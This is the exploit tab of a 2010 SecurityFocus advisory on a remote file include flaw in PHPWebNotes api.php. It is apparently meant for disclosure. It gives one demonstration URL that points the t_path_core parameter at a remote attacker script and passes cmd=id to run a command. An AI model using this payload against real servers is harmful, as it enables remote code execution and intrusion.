info
discussion
exploit
solution
references
PHPWebNotes Api.PHP Remote File Include Vulnerability
No exploit is required:
A demonstration exploit URL is provided:
http://www.example.com/xxxxx/api.php?t_path_core=http://pathtohackingscript?&cmd=id
Privacy Statement
Copyright 2010, SecurityFocus
